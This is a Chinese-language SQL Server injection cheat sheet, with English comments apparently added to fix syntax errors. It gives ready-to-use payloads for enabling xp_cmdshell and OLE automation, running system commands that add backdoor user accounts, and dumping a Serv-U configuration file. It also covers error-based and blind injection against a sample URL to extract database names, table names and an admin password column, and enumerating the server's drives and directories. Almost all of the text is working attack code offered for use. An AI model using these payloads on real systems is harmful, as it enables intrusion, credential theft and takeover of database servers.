 
一.开启扩展 
1.开启xp_cmdshell 
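-- Enable xp_cmdshell. sp_configure/RECONFIGURE need sysadmin-level rights on the instance;
-- the IS_SRVROLEMEMBER('sysadmin') probe further down this page is how to confirm that first.
-- 'show advanced options' has to be on before 'xp_cmdshell' is accepted as an option name, so the
-- two settings are applied back to back on one line (the trailing -- ends the injected statement).
-- Fix: the original was garbled as "EXECsp_configure" (missing space), which is a syntax error.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--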
关闭xp_cmdshell 
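-- Disable xp_cmdshell again (clean-up after use): same sequence as above with value 0.
-- Note this only flips the option back; the configuration change itself stays visible in
-- sys.configurations / the SQL Server error log, so it is not a way to hide the activity.
-- Fix: "EXECsp_configure" (missing space) restored to "EXEC sp_configure".
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--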
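-- Re-register the xp_cmdshell extended procedure when the procedure itself has been dropped
-- (sp_dropextendedproc), in which case enabling the option alone is not enough.
-- Single quotes: with the default QUOTED_IDENTIFIER ON, "xp_cmdshell" in double quotes is parsed
-- as an identifier rather than a string and the command fails.
-- xplog70.dll is the SQL Server 2000 host DLL for xp_cmdshell; NOTE(review): on 2005+ the
-- procedure lives in a different DLL (xpstar*.dll) — confirm the file name for the target version.
-- Documented equivalent: EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
dbcc addextendedproc('xp_cmdshell','xplog70.dll');--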
(添加xplog70.dll) 
2.开启'OPENROWSET' 
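-- Enable 'Ad Hoc Distributed Queries' so OPENROWSET / OPENDATASOURCE may open arbitrary
-- OLE DB connections (the Jet shell() trick below depends on this). Needs sysadmin-level rights.
-- Fix: "execsp_configure" (missing space) restored to "exec sp_configure".
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--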
查询分析器里执行：
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
即借助 Jet 引擎沙盒里的 shell() 函数执行系统命令。注意：该命令只创建普通本地用户 admin，并不会自动加入 Administrators 组；shell() 能否执行取决于 Jet 的沙盒模式（SandBoxMode）设置，而且 Jet 4.0 provider 只有 32 位版本，64 位 SQL Server 进程无法加载。
3.开启'sp_oacreate' 
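-- Enable 'Ole Automation Procedures' (sp_OACreate / sp_OAMethod / ...), which the COM-based
-- file copy, command execution and file read below rely on. Needs sysadmin-level rights.
-- Fix: "execsp_configure" (missing space) restored to "exec sp_configure".
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--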
拷贝文件 d:/windows/explorer.exe 至 c:/sethc.exe（注意下面语句的目标路径是 C 盘根目录，而不是 system32 下的 sethc.exe）
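-- Copy d:/windows/explorer.exe to c:/sethc.exe via the Scripting.FileSystemObject COM object
-- (requires 'Ole Automation Procedures' = 1, see above). The COM object runs inside the SQL Server
-- process, so the copy presumably succeeds only where the service account can read and write.
-- Fix: the OUTPUT variable was garbled as "@oout"; it must be "@o out" or sp_oacreate fails.
-- Note: the destination is the root of C:, not the system32 sethc.exe the surrounding prose implies.
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe','c:/sethc.exe';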
在查询分析器里执行 
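-- Run a command through the WScript.Shell COM object (requires 'Ole Automation Procedures' = 1).
-- Fix: the original had "OUTPUTEXEC" (missing separator between the two statements).
-- The command string is kept as-is; NOTE(review): the prose names the user "xcode", so
-- "xcodexcode" is presumably "xcode xcode" (user name + password) with the space lost — confirm.
-- net user /add only creates the account; nothing here adds it to the Administrators group.
DECLARE @shell INT; EXEC SP_OAcreate 'wscript.shell', @shell OUTPUT; EXEC SP_OAMETHOD @shell, 'run', null, 'C:/WINdows/system32/cmd.exe /c net user xcodexcode /add';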
这段代码利用 SP_OAcreate 调用 wscript.shell 执行 net user，添加一个名为 xcode 的本地用户（上面命令里的 "xcodexcode" 应为 "xcode xcode"，即用户名和密码之间丢了空格）。注意 net user /add 只创建普通用户，并不会自动提升为管理员，需要另行加入 Administrators 组。
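-- Read d:/Serv-U6.3/ServUDaemon.ini line by line through Scripting.FileSystemObject and PRINT
-- every line (dumps the Serv-U configuration file into the query output).
-- Requires 'Ole Automation Procedures' = 1; the file is opened from inside the SQL Server process,
-- so the service account must be able to read it.
-- @ret holds the HRESULT of each sp_oamethod call. The loop stops when readline fails, which is
-- presumably how end-of-file is detected here (readline past EOF returns an error) — an explicit
-- AtEndOfStream check would avoid the trailing error message.
-- Changes: dropped the unused @t; added sp_oadestroy so the COM handles are released explicitly
-- instead of lingering until the end of the batch.
declare @o int, @f int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
-- OpenTextFile(path, 1 = ForReading); @f receives the TextStream object handle
exec sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
-- release the TextStream first, then the FileSystemObject that created it
exec sp_oadestroy @f
exec sp_oadestroy @o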
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来 
二.有显错，报错注入（爆库/爆表/爆字段）。
and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数
and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--依次提交 dbid = 2,3,4... 得到更多的数据库名（name>1 强制把 nvarchar 的 name 转成 int，转换失败的报错信息里带出库名）
and 0<(select count(*) from employ.dbo.sysobjects where xtype='U');--折半法得到表个数(假设暴出库名employ)
and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一个表名（同样靠 varchar 与 int 比较时的转换报错带出）
假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj') 以此一直加条件...
and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name ='employ_qj'));--爆出一个列名
假设暴出字段名为"id"则在上面语句上加上条件 and name not in ('id') 以此一直加条件....
或者 
爆库语句
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--
爆表语句,somedb部份是所要列的数据库（char(85) 即 'U'，只列用户表）
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name)t order by name desc)=0--
爆字段语句,爆表admin里user='admin'的密码段
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where [user]='admin' Order by [password]) T Order by [password] Desc)=0--
（注意 user 是 T-SQL 保留字：不加方括号时 USER 是返回当前数据库用户名的函数，Where user='admin' 比较的是当前用户名而不是 user 列，所以必须写成 [user]。）
三.无显错,盲注。 
先说下SQL2005中的查询方法 
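-- Catalog queries behind the blind-injection steps below (SQL Server 2005 wording).
-- The sys* compatibility views still exist on 2005+; sys.databases / sys.objects / sys.columns
-- are the catalog views that superseded them.
-- Fix: "frommaster" and "wherextype" (missing spaces) restored.
select * from master.dbo.sysdatabases               --databases on the instance
select * from NetBook.dbo.sysobjects where xtype='u'    --user tables (xtype 'U') in database NetBook
-- object_id('book') resolves against the CURRENT database, so run this with NetBook as the
-- context (or use the three-part name, as the blind-injection payloads below do).
select * from NetBook.dbo.syscolumns where id=object_id('book')--columns of table book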
判断权限: 
and 1=(select IS_SRVROLEMEMBER('sysadmin')) 
and 1=(select IS_SRVROLEMEMBER('serveradmin')) 
and 1=(select IS_SRVROLEMEMBER('setupadmin')) 
and 1=(select IS_SRVROLEMEMBER('securityadmin')) 
and 1=(select IS_SRVROLEMEMBER('diskadmin')) 
and 1=(select IS_SRVROLEMEMBER('bulkadmin')) 
and 1=(select IS_MEMBER('db_owner'))   --db_owner 是数据库角色而不是固定服务器角色：IS_SRVROLEMEMBER('db_owner') 会因角色名无效而返回 NULL，条件永远为假，应改用 IS_MEMBER。以上各项返回 1/0，角色名不存在时返回 NULL
盲注常规步骤: 
判断库是否确实为MSSQL2005: 
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'   （"Microsoft SQL Server " 恰好 21 个字符，所以从第 22 位开始取 4 位就是版本年份）
猜数据库名:
先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1
猜表名(假设库名已经猜出为database；下面的 database、table 只是占位符，提交时必须换成实际猜出的名字——它们本身是 T-SQL 保留字，原样提交会报语法错误):
可以尝试先看有没管理表:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1
猜第一个,先长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1
猜第一个表名,逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1
猜第二个表名(假设第一个为table1):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1
... 
猜字段(假设表名已经猜出为table):
猜第一个字段:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二个(假设第一个为column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1
...
猜数据(假设要猜的字段为name):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database.dbo.table) and ascii(substring(name,1,1))>90)=1
（原文内层子查询写成 database_db，与外层的 database 不一致，应为同一个库名。另外 select top 1 没有 order by，返回哪一行并不保证稳定，逐位猜时建议加上 order by name。）
... 
四.其他一些语句(列目录) 
1.查看驱动器 
建表p(i为自动编号,a记录盘符类似"c:/",b记录可用字节,其它省略) 
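-- Scratch table for the xp_availablemedia result set. i is an identity column so rows can be
-- addressed by position in the probes below; per the prose a = drive letter ("c:/") and b = free
-- bytes, c/d hold the remaining columns. INSERT ... EXEC requires the table's non-identity column
-- count to match the procedure's result set, so do not drop c/d.
-- Fix: "bnvarchar(255)" (missing space) restored to "b nvarchar(255)".
;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--
-- xp_availablemedia enumerates every drive visible to the SQL Server process. The table p is left
-- behind in the target database, so drop it once the probes are done.
;insert p exec xp_availablemedia;--list all drives and insert them into table p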
and (select count(*) from p)>3;--折半法查出驱动器总数 
and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注 ascii('C')=67)
上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名 
and (select a from p where i=1)>3;--报错得到第一个驱动器名 
上面一般用于显错情况下使用-------以此类推,得到所有驱动器名 
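-- Remove the scratch table created for the drive enumeration so nothing is left in the target DB.
;drop table p;--drop table p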
 
2.查看目录 
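-- Scratch table for the xp_dirtree result set: m = directory name, i = depth (level 1 is the
-- drive root per the probes below). i is declared nvarchar in the original; the int depth is
-- implicitly converted on insert, so this works but an int column would be the precise type.
-- Fix: "invarchar(255)" (missing space) restored to "i nvarchar(255)".
;create table pa(m nvarchar(255),i nvarchar(255));--
-- xp_dirtree with only the path argument returns two columns (subdirectory, depth), matching pa.
-- NOTE(review): passing the optional depth/file arguments presumably changes the column set and
-- would break this INSERT ... EXEC — keep the call as written unless pa is widened too.
;insert pa exec xp_dirtree 'e:';--list drive e: and insert the tree into table pa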
and (select count(*) from pa where i>0)>-1;--折半法查出i深度 
and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错得到深度i=1的第一个目录名
上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录。注意 top N 没有 order by 时顺序不保证稳定，内外两个子查询最好都加 order by m，否则可能漏掉或重复目录
and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度
and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名第一个字符的ASCII码
上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录
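-- Remove the scratch table created for the directory enumeration.
;drop table pa;--drop table pa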
经过上面的方法就可得到服务器上的所有目录（严格说是 SQL Server 服务账户有读取权限的目录：xp_dirtree 在 SQL Server 进程内执行，用的是服务账户而不是连接用户的权限）。
 
 
 